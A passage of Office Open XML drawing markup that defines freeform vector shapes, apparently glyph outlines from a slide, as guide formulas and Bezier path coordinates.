                <a:gd name="T36" fmla="*/ 90 w 184"/>
                <a:gd name="T37" fmla="*/ 41 h 301"/>
                <a:gd name="T38" fmla="*/ 110 w 184"/>
                <a:gd name="T39" fmla="*/ 2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1">
                  <a:moveTo>
                    <a:pt x="184" y="291"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="280"/>
                    <a:pt x="173" y="280"/>
                    <a:pt x="168" y="280"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="108" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="105"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="93"/>
                    <a:pt x="106" y="89"/>
                    <a:pt x="93" y="89"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="89"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="89"/>
                    <a:pt x="4" y="89"/>
                    <a:pt x="4" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="110"/>
                    <a:pt x="14" y="110"/>
                    <a:pt x="20" y="110"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="84" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="280"/>
                    <a:pt x="0" y="280"/>
                    <a:pt x="0" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="301"/>
                    <a:pt x="10" y="301"/>
                    <a:pt x="16" y="301"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="301"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="301"/>
                    <a:pt x="184" y="301"/>
                    <a:pt x="184" y="291"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="110" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="9"/>
                    <a:pt x="101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2"/>
                    <a:pt x="79" y="41"/>
                    <a:pt x="90" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="41"/>
                    <a:pt x="110" y="32"/>
                    <a:pt x="110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7" name="Freeform 1023">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5B05D14-4172-4670-B838-2646B3191D07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397250" y="665163"/>
              <a:ext cx="95250" cy="84138"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 248 w 248"/>
                <a:gd name="T1" fmla="*/ 205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5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5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5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8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3 w 248"/>
                <a:gd name="T47" fmla="*/ 194 h 215"/>
                <a:gd name="T48" fmla="*/ 137 w 248"/>
                <a:gd name="T49" fmla="*/ 205 h 215"/>
                <a:gd name="T50" fmla="*/ 153 w 248"/>
                <a:gd name="T51" fmla="*/ 215 h 215"/>
                <a:gd name="T52" fmla="*/ 232 w 248"/>
                <a:gd name="T53" fmla="*/ 215 h 215"/>
                <a:gd name="T54" fmla="*/ 248 w 248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5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7"/>
                    <a:pt x="69" y="35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8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8" name="Freeform 1024">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1293CB3B-628E-4DDC-86B9-C117A996FD65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500437" y="641350"/>
              <a:ext cx="79375" cy="107950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3 w 209"/>
                <a:gd name="T5" fmla="*/ 215 h 278"/>
                <a:gd name="T6" fmla="*/ 136 w 209"/>
                <a:gd name="T7" fmla="*/ 257 h 278"/>
                <a:gd name="T8" fmla="*/ 92 w 209"/>
                <a:gd name="T9" fmla="*/ 212 h 278"/>
                <a:gd name="T10" fmla="*/ 92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2 w 209"/>
                <a:gd name="T19" fmla="*/ 63 h 278"/>
                <a:gd name="T20" fmla="*/ 92 w 209"/>
                <a:gd name="T21" fmla="*/ 16 h 278"/>
                <a:gd name="T22" fmla="*/ 79 w 209"/>
                <a:gd name="T23" fmla="*/ 0 h 278"/>
                <a:gd name="T24" fmla="*/ 67 w 209"/>
                <a:gd name="T25" fmla="*/ 16 h 278"/>
                <a:gd name="T26" fmla="*/ 67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7 w 209"/>
                <a:gd name="T35" fmla="*/ 84 h 278"/>
                <a:gd name="T36" fmla="*/ 67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2" y="257"/>
                    <a:pt x="92" y="227"/>
                    <a:pt x="92" y="212"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="92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2" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="16"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="9"/>
                    <a:pt x="92" y="0"/>
                    <a:pt x="79" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="0"/>
                    <a:pt x="67" y="8"/>
                    <a:pt x="67" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="67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7" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="67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9" name="Freeform 1025">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{633ED875-2224-4193-B046-51E4B240F250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603625" y="628650"/>
              <a:ext cx="74613" cy="1206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6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0" name="Freeform 1026">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FCEAEE2-9DA0-492E-8C52-C1579BB36E04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832225" y="615950"/>
              <a:ext cx="26988" cy="57150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 72"/>
                <a:gd name="T1" fmla="*/ 11 h 148"/>
                <a:gd name="T2" fmla="*/ 62 w 72"/>
                <a:gd name="T3" fmla="*/ 0 h 148"/>
                <a:gd name="T4" fmla="*/ 0 w 72"/>
                <a:gd name="T5" fmla="*/ 95 h 148"/>
                <a:gd name="T6" fmla="*/ 35 w 72"/>
                <a:gd name="T7" fmla="*/ 148 h 148"/>
                <a:gd name="T8" fmla="*/ 56 w 72"/>
                <a:gd name="T9" fmla="*/ 128 h 148"/>
                <a:gd name="T10" fmla="*/ 35 w 72"/>
                <a:gd name="T11" fmla="*/ 107 h 148"/>
                <a:gd name="T12" fmla="*/ 28 w 72"/>
                <a:gd name="T13" fmla="*/ 108 h 148"/>
                <a:gd name="T14" fmla="*/ 21 w 72"/>
                <a:gd name="T15" fmla="*/ 95 h 148"/>
                <a:gd name="T16" fmla="*/ 65 w 72"/>
                <a:gd name="T17" fmla="*/ 20 h 148"/>
                <a:gd name="T18" fmla="*/ 72 w 72"/>
                <a:gd name="T19" fmla="*/ 1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48">
                  <a:moveTo>
                    <a:pt x="72" y="11"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="5"/>
                    <a:pt x="66" y="0"/>
                    <a:pt x="62" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="0" y="34"/>
                    <a:pt x="0" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="131"/>
                    <a:pt x="16" y="148"/>
                    <a:pt x="35" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="148"/>
                    <a:pt x="56" y="138"/>
                    <a:pt x="56" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="117"/>
                    <a:pt x="48" y="107"/>
                    <a:pt x="35" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="107"/>
                    <a:pt x="28" y="108"/>
                    <a:pt x="28" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="108"/>
                    <a:pt x="21" y="100"/>
                    <a:pt x="21" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="84"/>
                    <a:pt x="22" y="45"/>
                    <a:pt x="65" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="18"/>
                    <a:pt x="72" y="16"/>
                    <a:pt x="72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1" name="Freeform 1027">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FCD120D-7FA4-4F84-9895-652F0C6AF347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932237" y="615950"/>
              <a:ext cx="26988" cy="57150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 72"/>
                <a:gd name="T1" fmla="*/ 11 h 148"/>
                <a:gd name="T2" fmla="*/ 62 w 72"/>
                <a:gd name="T3" fmla="*/ 0 h 148"/>
                <a:gd name="T4" fmla="*/ 0 w 72"/>
                <a:gd name="T5" fmla="*/ 95 h 148"/>
                <a:gd name="T6" fmla="*/ 35 w 72"/>
                <a:gd name="T7" fmla="*/ 148 h 148"/>
                <a:gd name="T8" fmla="*/ 56 w 72"/>
                <a:gd name="T9" fmla="*/ 128 h 148"/>
                <a:gd name="T10" fmla="*/ 36 w 72"/>
                <a:gd name="T11" fmla="*/ 107 h 148"/>
                <a:gd name="T12" fmla="*/ 29 w 72"/>
                <a:gd name="T13" fmla="*/ 108 h 148"/>
                <a:gd name="T14" fmla="*/ 21 w 72"/>
                <a:gd name="T15" fmla="*/ 95 h 148"/>
                <a:gd name="T16" fmla="*/ 66 w 72"/>
                <a:gd name="T17" fmla="*/ 20 h 148"/>
                <a:gd name="T18" fmla="*/ 72 w 72"/>
                <a:gd name="T19" fmla="*/ 1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48">
                  <a:moveTo>
                    <a:pt x="72" y="11"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="5"/>
                    <a:pt x="67" y="0"/>
                    <a:pt x="62" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="0" y="34"/>
                    <a:pt x="0" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="131"/>
                    <a:pt x="16" y="148"/>
                    <a:pt x="35" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="148"/>
                    <a:pt x="56" y="138"/>
                    <a:pt x="56" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="117"/>
                    <a:pt x="48" y="107"/>
                    <a:pt x="36" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="107"/>
                    <a:pt x="29" y="108"/>
                    <a:pt x="29" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="108"/>
                    <a:pt x="21" y="100"/>
                    <a:pt x="21" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="84"/>
                    <a:pt x="23" y="45"/>
                    <a:pt x="66" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="18"/>
                    <a:pt x="72" y="16"/>
                    <a:pt x="72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2" name="Freeform 1028">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85B9146D-94E8-4944-97CE-D3266164A24A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005262" y="603250"/>
              <a:ext cx="74613" cy="193675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 193 w 193"/>
                <a:gd name="T1" fmla="*/ 489 h 499"/>
                <a:gd name="T2" fmla="*/ 191 w 193"/>
                <a:gd name="T3" fmla="*/ 480 h 499"/>
                <a:gd name="T4" fmla="*/ 21 w 193"/>
                <a:gd name="T5" fmla="*/ 11 h 499"/>
                <a:gd name="T6" fmla="*/ 10 w 193"/>
                <a:gd name="T7" fmla="*/ 0 h 499"/>
                <a:gd name="T8" fmla="*/ 0 w 193"/>
                <a:gd name="T9" fmla="*/ 10 h 499"/>
                <a:gd name="T10" fmla="*/ 3 w 193"/>
                <a:gd name="T11" fmla="*/ 19 h 499"/>
                <a:gd name="T12" fmla="*/ 172 w 193"/>
                <a:gd name="T13" fmla="*/ 488 h 499"/>
                <a:gd name="T14" fmla="*/ 183 w 193"/>
                <a:gd name="T15" fmla="*/ 499 h 499"/>
                <a:gd name="T16" fmla="*/ 193 w 193"/>
                <a:gd name="T17" fmla="*/ 48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499">
                  <a:moveTo>
                    <a:pt x="193" y="489"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="489"/>
                    <a:pt x="193" y="486"/>
                    <a:pt x="191" y="480"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="11"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="6"/>
                    <a:pt x="17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3"/>
                    <a:pt x="3" y="19"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="488"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="493"/>
                    <a:pt x="176" y="499"/>
                    <a:pt x="183" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="499"/>
                    <a:pt x="193" y="494"/>
                    <a:pt x="193" y="4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3" name="Freeform 1029">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C326BA7C-B4F1-42E3-B7C9-72D9490FF34A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095750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6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5 w 232"/>
                <a:gd name="T25" fmla="*/ 21 h 212"/>
                <a:gd name="T26" fmla="*/ 95 w 232"/>
                <a:gd name="T27" fmla="*/ 11 h 212"/>
                <a:gd name="T28" fmla="*/ 80 w 232"/>
                <a:gd name="T29" fmla="*/ 0 h 212"/>
                <a:gd name="T30" fmla="*/ 19 w 232"/>
                <a:gd name="T31" fmla="*/ 0 h 212"/>
                <a:gd name="T32" fmla="*/ 4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2 h 212"/>
                <a:gd name="T52" fmla="*/ 60 w 232"/>
                <a:gd name="T53" fmla="*/ 191 h 212"/>
                <a:gd name="T54" fmla="*/ 115 w 232"/>
                <a:gd name="T55" fmla="*/ 116 h 212"/>
                <a:gd name="T56" fmla="*/ 171 w 232"/>
                <a:gd name="T57" fmla="*/ 191 h 212"/>
                <a:gd name="T58" fmla="*/ 140 w 232"/>
                <a:gd name="T59" fmla="*/ 202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6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1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4" y="0"/>
                    <a:pt x="4" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4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6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2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4" name="Freeform 1030">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E69809A-D5EC-450C-855C-FA6902AD9554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200525" y="627063"/>
              <a:ext cx="80963" cy="1238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60" y="0"/>
                    <a:pt x="105" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="0" y="67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09" y="248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2"/>
                    <a:pt x="147" y="295"/>
                    <a:pt x="105" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="295"/>
                    <a:pt x="26" y="232"/>
                    <a:pt x="26" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="73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5" name="Freeform 1031">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A450AA7-D158-4634-B5EF-26661E211A2A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297362" y="627063"/>
              <a:ext cx="87313" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 230 w 230"/>
                <a:gd name="T1" fmla="*/ 213 h 310"/>
                <a:gd name="T2" fmla="*/ 215 w 230"/>
                <a:gd name="T3" fmla="*/ 202 h 310"/>
                <a:gd name="T4" fmla="*/ 170 w 230"/>
                <a:gd name="T5" fmla="*/ 202 h 310"/>
                <a:gd name="T6" fmla="*/ 170 w 230"/>
                <a:gd name="T7" fmla="*/ 16 h 310"/>
                <a:gd name="T8" fmla="*/ 153 w 230"/>
                <a:gd name="T9" fmla="*/ 0 h 310"/>
                <a:gd name="T10" fmla="*/ 139 w 230"/>
                <a:gd name="T11" fmla="*/ 0 h 310"/>
                <a:gd name="T12" fmla="*/ 122 w 230"/>
                <a:gd name="T13" fmla="*/ 8 h 310"/>
                <a:gd name="T14" fmla="*/ 2 w 230"/>
                <a:gd name="T15" fmla="*/ 196 h 310"/>
                <a:gd name="T16" fmla="*/ 0 w 230"/>
                <a:gd name="T17" fmla="*/ 208 h 310"/>
                <a:gd name="T18" fmla="*/ 16 w 230"/>
                <a:gd name="T19" fmla="*/ 223 h 310"/>
                <a:gd name="T20" fmla="*/ 151 w 230"/>
                <a:gd name="T21" fmla="*/ 223 h 310"/>
                <a:gd name="T22" fmla="*/ 151 w 230"/>
                <a:gd name="T23" fmla="*/ 289 h 310"/>
                <a:gd name="T24" fmla="*/ 114 w 230"/>
                <a:gd name="T25" fmla="*/ 289 h 310"/>
                <a:gd name="T26" fmla="*/ 98 w 230"/>
                <a:gd name="T27" fmla="*/ 300 h 310"/>
                <a:gd name="T28" fmla="*/ 114 w 230"/>
                <a:gd name="T29" fmla="*/ 310 h 310"/>
                <a:gd name="T30" fmla="*/ 207 w 230"/>
                <a:gd name="T31" fmla="*/ 310 h 310"/>
                <a:gd name="T32" fmla="*/ 222 w 230"/>
                <a:gd name="T33" fmla="*/ 300 h 310"/>
                <a:gd name="T34" fmla="*/ 207 w 230"/>
                <a:gd name="T35" fmla="*/ 289 h 310"/>
                <a:gd name="T36" fmla="*/ 170 w 230"/>
                <a:gd name="T37" fmla="*/ 289 h 310"/>
                <a:gd name="T38" fmla="*/ 170 w 230"/>
                <a:gd name="T39" fmla="*/ 223 h 310"/>
                <a:gd name="T40" fmla="*/ 215 w 230"/>
                <a:gd name="T41" fmla="*/ 223 h 310"/>
                <a:gd name="T42" fmla="*/ 230 w 230"/>
                <a:gd name="T43" fmla="*/ 213 h 310"/>
                <a:gd name="T44" fmla="*/ 151 w 230"/>
                <a:gd name="T45" fmla="*/ 202 h 310"/>
                <a:gd name="T46" fmla="*/ 22 w 230"/>
                <a:gd name="T47" fmla="*/ 202 h 310"/>
                <a:gd name="T48" fmla="*/ 137 w 230"/>
                <a:gd name="T49" fmla="*/ 21 h 310"/>
                <a:gd name="T50" fmla="*/ 151 w 230"/>
                <a:gd name="T51" fmla="*/ 21 h 310"/>
                <a:gd name="T52" fmla="*/ 151 w 230"/>
                <a:gd name="T53" fmla="*/ 20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0">
                  <a:moveTo>
                    <a:pt x="230" y="213"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="202"/>
                    <a:pt x="220" y="202"/>
                    <a:pt x="215" y="202"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="170" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="16"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="3"/>
                    <a:pt x="167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2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4" y="223"/>
                    <a:pt x="16" y="223"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="289"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="289"/>
                    <a:pt x="98" y="289"/>
                    <a:pt x="98" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="310"/>
                    <a:pt x="108" y="310"/>
                    <a:pt x="114" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="310"/>
                    <a:pt x="222" y="310"/>
                    <a:pt x="222" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="289"/>
                    <a:pt x="212" y="289"/>
                    <a:pt x="207" y="289"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="170" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215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1" y="202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="22" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151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6" name="Freeform 1032">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF15F07D-32FC-4C86-BFDD-B08CCE33BDB0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402137" y="603250"/>
              <a:ext cx="73025" cy="193675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 193 w 193"/>
                <a:gd name="T1" fmla="*/ 489 h 499"/>
                <a:gd name="T2" fmla="*/ 191 w 193"/>
                <a:gd name="T3" fmla="*/ 480 h 499"/>
                <a:gd name="T4" fmla="*/ 21 w 193"/>
                <a:gd name="T5" fmla="*/ 11 h 499"/>
                <a:gd name="T6" fmla="*/ 10 w 193"/>
                <a:gd name="T7" fmla="*/ 0 h 499"/>
                <a:gd name="T8" fmla="*/ 0 w 193"/>
                <a:gd name="T9" fmla="*/ 10 h 499"/>
                <a:gd name="T10" fmla="*/ 3 w 193"/>
                <a:gd name="T11" fmla="*/ 19 h 499"/>
                <a:gd name="T12" fmla="*/ 172 w 193"/>
                <a:gd name="T13" fmla="*/ 488 h 499"/>
                <a:gd name="T14" fmla="*/ 183 w 193"/>
                <a:gd name="T15" fmla="*/ 499 h 499"/>
                <a:gd name="T16" fmla="*/ 193 w 193"/>
                <a:gd name="T17" fmla="*/ 48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499">
                  <a:moveTo>
                    <a:pt x="193" y="489"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="489"/>
                    <a:pt x="193" y="486"/>
                    <a:pt x="191" y="480"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="11"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="6"/>
                    <a:pt x="17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3"/>
                    <a:pt x="3" y="19"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="488"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="493"/>
                    <a:pt x="176" y="499"/>
                    <a:pt x="183" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="499"/>
                    <a:pt x="193" y="494"/>
                    <a:pt x="193" y="4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7" name="Freeform 1033">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{939B18B1-08BC-4435-9789-507B9178F7FD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492625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2 w 232"/>
                <a:gd name="T19" fmla="*/ 11 h 212"/>
                <a:gd name="T20" fmla="*/ 163 w 232"/>
                <a:gd name="T21" fmla="*/ 21 h 212"/>
                <a:gd name="T22" fmla="*/ 114 w 232"/>
                <a:gd name="T23" fmla="*/ 88 h 212"/>
                <a:gd name="T24" fmla="*/ 65 w 232"/>
                <a:gd name="T25" fmla="*/ 21 h 212"/>
                <a:gd name="T26" fmla="*/ 95 w 232"/>
                <a:gd name="T27" fmla="*/ 11 h 212"/>
                <a:gd name="T28" fmla="*/ 79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4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6 w 232"/>
                <a:gd name="T49" fmla="*/ 212 h 212"/>
                <a:gd name="T50" fmla="*/ 91 w 232"/>
                <a:gd name="T51" fmla="*/ 202 h 212"/>
                <a:gd name="T52" fmla="*/ 60 w 232"/>
                <a:gd name="T53" fmla="*/ 191 h 212"/>
                <a:gd name="T54" fmla="*/ 114 w 232"/>
                <a:gd name="T55" fmla="*/ 116 h 212"/>
                <a:gd name="T56" fmla="*/ 170 w 232"/>
                <a:gd name="T57" fmla="*/ 191 h 212"/>
                <a:gd name="T58" fmla="*/ 140 w 232"/>
                <a:gd name="T59" fmla="*/ 202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1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8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1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2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6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2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8" name="Freeform 1034">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC2068E2-F0B3-494D-8795-CBF310AC7F2A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595812" y="628650"/>
              <a:ext cx="73025" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 194 w 194"/>
                <a:gd name="T1" fmla="*/ 25 h 307"/>
                <a:gd name="T2" fmla="*/ 149 w 194"/>
                <a:gd name="T3" fmla="*/ 0 h 307"/>
                <a:gd name="T4" fmla="*/ 73 w 194"/>
                <a:gd name="T5" fmla="*/ 63 h 307"/>
                <a:gd name="T6" fmla="*/ 73 w 194"/>
                <a:gd name="T7" fmla="*/ 95 h 307"/>
                <a:gd name="T8" fmla="*/ 17 w 194"/>
                <a:gd name="T9" fmla="*/ 95 h 307"/>
                <a:gd name="T10" fmla="*/ 1 w 194"/>
                <a:gd name="T11" fmla="*/ 106 h 307"/>
                <a:gd name="T12" fmla="*/ 16 w 194"/>
                <a:gd name="T13" fmla="*/ 116 h 307"/>
                <a:gd name="T14" fmla="*/ 73 w 194"/>
                <a:gd name="T15" fmla="*/ 116 h 307"/>
                <a:gd name="T16" fmla="*/ 73 w 194"/>
                <a:gd name="T17" fmla="*/ 286 h 307"/>
                <a:gd name="T18" fmla="*/ 16 w 194"/>
                <a:gd name="T19" fmla="*/ 286 h 307"/>
                <a:gd name="T20" fmla="*/ 0 w 194"/>
                <a:gd name="T21" fmla="*/ 296 h 307"/>
                <a:gd name="T22" fmla="*/ 16 w 194"/>
                <a:gd name="T23" fmla="*/ 307 h 307"/>
                <a:gd name="T24" fmla="*/ 156 w 194"/>
                <a:gd name="T25" fmla="*/ 307 h 307"/>
                <a:gd name="T26" fmla="*/ 172 w 194"/>
                <a:gd name="T27" fmla="*/ 297 h 307"/>
                <a:gd name="T28" fmla="*/ 156 w 194"/>
                <a:gd name="T29" fmla="*/ 286 h 307"/>
                <a:gd name="T30" fmla="*/ 98 w 194"/>
                <a:gd name="T31" fmla="*/ 286 h 307"/>
                <a:gd name="T32" fmla="*/ 98 w 194"/>
                <a:gd name="T33" fmla="*/ 116 h 307"/>
                <a:gd name="T34" fmla="*/ 167 w 194"/>
                <a:gd name="T35" fmla="*/ 116 h 307"/>
                <a:gd name="T36" fmla="*/ 182 w 194"/>
                <a:gd name="T37" fmla="*/ 106 h 307"/>
                <a:gd name="T38" fmla="*/ 167 w 194"/>
                <a:gd name="T39" fmla="*/ 95 h 307"/>
                <a:gd name="T40" fmla="*/ 98 w 194"/>
                <a:gd name="T41" fmla="*/ 95 h 307"/>
                <a:gd name="T42" fmla="*/ 98 w 194"/>
                <a:gd name="T43" fmla="*/ 66 h 307"/>
                <a:gd name="T44" fmla="*/ 159 w 194"/>
                <a:gd name="T45" fmla="*/ 21 h 307"/>
                <a:gd name="T46" fmla="*/ 176 w 194"/>
                <a:gd name="T47" fmla="*/ 43 h 307"/>
                <a:gd name="T48" fmla="*/ 194 w 194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7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7" y="95"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="95"/>
                    <a:pt x="1" y="95"/>
                    <a:pt x="1" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="116"/>
                    <a:pt x="11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1" y="286"/>
                    <a:pt x="0" y="286"/>
                    <a:pt x="0" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="307"/>
                    <a:pt x="11" y="307"/>
                    <a:pt x="16" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156" y="307"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="307"/>
                    <a:pt x="172" y="307"/>
                    <a:pt x="172" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="286"/>
                    <a:pt x="161" y="286"/>
                    <a:pt x="156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7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3" y="95"/>
                    <a:pt x="167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6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9" name="Freeform 1035">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
